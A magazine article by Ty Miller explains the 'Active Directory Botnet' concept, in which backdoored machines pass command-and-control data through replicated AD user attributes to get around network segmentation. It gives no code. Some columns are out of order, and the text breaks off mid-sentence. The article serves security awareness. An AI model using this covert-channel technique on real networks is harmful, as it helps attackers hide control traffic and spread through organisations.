Cyber Security
The active directory botnet
B By Ty Miller
otnets and command & control servers (a.k.a. C&C or C2 servers) are taking over the internet and are rapidly becoming a potential new major threat. Recent industry research from Verizon highlights the issue of how control may be unwittingly handed to an attacker. The “Verizon 2017 Data Breach Investigations Report” reveals “phishing remains a favourite technique of attackers” and “payloads are commonly delivered via email (73%) and driveby downloads (13%)”. The report continues: “if the attachment is opened, it will drop command and control malware to establish and maintain control of the device”.
security team have segmented all of these systems into security zones with firewalls and network filtering to contain the breaches. Microsoft Active Directory is used by most organisations as their central authentication and identity management solution. Due to the architecture of nearly every Active Directory implementation on the planet, almost all servers, workstations, laptops, mobile devices, and wireless devices throughout your organisation, can connect to an Active Directory Domain Controller for authentication purposes.
Identifying compromised machines A life of their own There are many considerations of how botnets and C&C servers can become independently threatening. For instance, what happens when these botnets and C&C servers start existing and operating inside the walls of our organisations? Another consideration is the damage these botnets and C&C servers could achieve if they bypass our network controls. Likewise, if these botnets and C&C servers began communicating internally bypassing our security zones and firewalls. It makes you wonder what would happen if modern controls such as microsegmentation were all of a sudden useless. These nightmare scenarios are well on their way to becoming a reality. The Active Directory Botnet attack concept arises due to a fundamental flaw in the way nearly every organisation implements its Active Directory (AD) solution, which leaves a gaping hole within security and the ability to contain security breaches. Let’s say that your organisation has become the victim of a spear phishing attack and a range of your internal systems across multiple WAN sites around the world have been breached. Not only this, but some of your internet exposed systems in your DMZ and Azure cloud environment have also been breached. This sounds bad, but luckily your
44 | Australian Cyber Security Magazine
The Active Directory Botnet Client, or “Bot” is the backdoor installed on each of the compromised machines. It updates the currently logged in users’ standard Active Directory attributes, including registering with the internal Active Directory Botnet. Standard Active Directory accounts support over 50 user attributes, such as name, IP phone, postal address and info, which can be combined to create a covert communication channel between any compromised domain machine located throughout your organisation. These standard user attributes range in size from a small number of bytes through to one megabyte, which provides sufficient bandwidth for sending commands, receiving command output, and uploading or downloading files between the infected endpoints. The Active Directory Botnet Client injects unique command and control data entries into its corresponding AD account attributes within the target Domain Controller, which then automatically synchronises the data across every Active Directory Domain Controller throughout the organisation. At this point, any Active Directory Botnet Client within the domain can identify compromised machines via its Domain Controller and begin issuing commands to be executed on any of the infected endpoints. When one of the Bots injects a command into its Domain Controller, every infected machine polls its Domain